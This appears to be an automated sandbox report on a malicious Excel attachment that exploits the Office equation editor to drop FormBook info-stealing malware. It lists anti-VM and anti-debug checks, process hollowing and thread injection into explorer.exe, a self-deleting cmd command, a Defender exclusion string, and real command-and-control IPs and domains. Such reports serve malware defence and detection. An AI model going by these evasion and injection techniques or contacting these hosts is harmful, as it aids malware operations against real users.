Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: Processed APR12.xlsx Stream path 'EncryptedPackage' entropy: 7.99992880466 (max. 8.0)

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2684, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 00000000001085E4 second address: 00000000001085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 000000000010896E second address: 0000000000108974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088A0 rdtsc 5_2_004088A0
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2324 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2704 Thread sleep time: -102329s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 920 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2404 Thread sleep time: -35000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 1916 Thread sleep time: -34000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 102329 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000006.00000002.2393233250.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2203299688.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.2203360504.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.2203299688.0000000004234000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000006.00000000.2185699010.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088A0 rdtsc 5_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409B10 LdrLoadDll, 5_2_00409B10
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 5_2_009326F8 mov eax, dword ptr fs:[00000030h] 5_2_009326F8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007B26F8 mov eax, dword ptr fs:[00000030h] 7_2_007B26F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 52.58.78.16 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tricqr.com
Source: C:\Windows\explorer.exe Domain query: www.ruhexuangou.com
Source: C:\Windows\explorer.exe Domain query: www.vectoroutlines.com
Source: C:\Windows\explorer.exe Domain query: www.centergolosinas.com
Source: C:\Windows\explorer.exe Domain query: www.buylocalclub.info
Source: C:\Windows\explorer.exe Domain query: www.aideliveryrobot.com
Source: C:\Windows\explorer.exe Domain query: www.dreamcashbuyers.com
Source: C:\Windows\explorer.exe Network Connect: 192.169.223.13 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 160.153.137.40 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.82.57.32 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.shopihy.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.126.105 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 18.236.1.157 80 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 5E0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 00000006.00000000.2191136590.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.2191136590.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.2393233250.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2191136590.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385456 Sample: Processed APR12.xlsx Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 39 www.zgcbw.net 2->39 55 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 11 other signatures 2->61 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 174 40 2->16         started        signatures3 process4 dnsIp5 47 3.125.17.227, 49167, 80 AMAZON-02US United States 11->47 33 C:\Users\user\AppData\Local\...\xles[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->79 18 vbc.exe 11->18         started        37 C:\Users\user\...\~$Processed APR12.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 49 Multi AV Scanner detection for dropped file 18->49 51 Tries to detect virtualization through RDTSC time measurements 18->51 53 Injects a PE file into a foreign processes 18->53 21 vbc.exe 18->21         started        process10 signatures11 63 Modifies the context of a thread in another process (thread injection) 21->63 65 Maps a DLL or memory area into another process 21->65 67 Sample uses process hollowing technique 21->67 69 Queues an APC in another process (thread injection) 21->69 24 explorer.exe 21->24 injected process12 dnsIp13 41 vectoroutlines.com 198.54.126.105, 49169, 80 NAMECHEAP-NETUS United States 24->41 43 www.ruhexuangou.com 23.82.57.32, 49170, 80 LEASEWEB-USA-SFO-12US United States 24->43 45 13 other IPs or domains 24->45 71 System process connects to network (likely due to code injection or exploit) 24->71 28 help.exe 24->28         started        signatures14 process15 signatures16 73 Modifies the context of a thread in another process (thread injection) 28->73 75 Maps a DLL or memory area into another process 28->75 77 Tries to detect virtualization through RDTSC time measurements 28->77 31 cmd.exe 28->31         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
52.58.78.16
 www.aideliveryrobot.com United States
16509 AMAZON-02US true
23.82.57.32
 www.ruhexuangou.com United States
7203 LEASEWEB-USA-SFO-12US true
3.125.17.227
 unknown United States
16509 AMAZON-02US false
198.54.126.105
 vectoroutlines.com United States
22612 NAMECHEAP-NETUS true
18.236.1.157
 sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com United States
16509 AMAZON-02US false
192.169.223.13
 centergolosinas.com United States
26496 AS-26496-GO-DADDY-COM-LLCUS true
160.153.137.40
 shopihy.com United States
21501 GODADDY-AMSDE true

Private
IP
192.168.2.22
192.168.2.255

Contacted Domains

Name IP Active
shopihy.com 160.153.137.40 true
www.ruhexuangou.com 23.82.57.32 true
centergolosinas.com 192.169.223.13 true
sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com 18.236.1.157 true
www.aideliveryrobot.com 52.58.78.16 true
vectoroutlines.com 198.54.126.105 true
www.tricqr.com unknown unknown
www.shopihy.com unknown unknown
www.vectoroutlines.com unknown unknown
www.zgcbw.net unknown unknown
www.centergolosinas.com unknown unknown
www.buylocalclub.info unknown unknown
www.dreamcashbuyers.com unknown unknown